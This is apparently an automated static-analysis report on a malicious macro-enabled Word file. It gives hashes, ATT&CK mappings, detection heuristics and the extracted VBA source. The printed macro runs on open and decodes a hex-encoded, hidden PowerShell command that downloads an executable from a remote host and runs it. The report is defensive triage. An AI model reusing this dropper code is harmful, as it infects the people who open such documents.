Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f0ea6a93a0fccfde…

MALICIOUS

Office (OOXML)

54.8 KB Created: 2021-01-31 23:09:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-06-04
MD5: ddabab3e35ead7e5b370f8a6a3c4270d SHA-1: 9dadc7ef3dbd173406c35ebc8e0590ab5d3e01b7 SHA-256: f0ea6a93a0fccfde17834411499d79dc2e28540a75888605ad494a74cda253ff
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that are automatically executed upon opening, as indicated by the 'AutoOpen' macro firing. The 'rep0' subroutine within the VBA code decodes a hexadecimal string which, when reconstructed, reveals a PowerShell command. This command is designed to download a second-stage executable ('m1.exe') from 'http://apo.palen.club:2095/xt/m1.exe' and save it as '%TEMP%\reg.exe', which is then executed. This indicates a dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Generic-9823774-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823774-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1351 bytes
SHA-256: b7ed3ad7aa29d3797ec1b117aa7f128f7e9d372b51be781d045cedde77c0eb31
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ilan()
itRotate(BitXOR(73609,1943))) ]
Local $qsvt = ["xauirwzhpgvljwwgwfosnovxn" ,BitAnd(BitNot(BitNot(80293)),2245) ,"mbaqhqcxwiffcdbnpcnkwkwbk" ,Sqrt(BitNot(Int(82279))) ,"kxqioqrisxnaxyqlkjytynozw" ,BitAnd(Sqrt(24605),209) ,"gympbtsxyjydmakqjzhrduvgb" ]

End Sub

Sub faid()

End Sub


Sub rep0()
Call Shell(ChrEncode("706F7765727368656C6C2E657865202D657865637574696F6E706F6C69637920627970617373202D572048696464656E202D636F6D6D616E6420286E65772D6F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F61706F2E70616C656E632E636C75623A323039352F78742F6D312E657865272C24656E763A54656D702B275C7265672E65786527293B284E65772D4F626A656374202D636F6D205368656C6C2E4170706C69636174696F6E292E5368656C6C457865637574652824656E763A54656D702B275C7265672E6578652729"))
End Sub

Function ChrEncode(str)
    Dim i
    Dim sStr
    sStr = ""
    For i = 1 To Len(str) Step 2
        sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2)))
    Next
    ChrEncode = sStr
End Function

Sub autoopen()
rep0
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 10240 bytes
SHA-256: b4c439f21dd3b0cc92da90bb106da50109f974a1c3333b1e81052984aef920a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.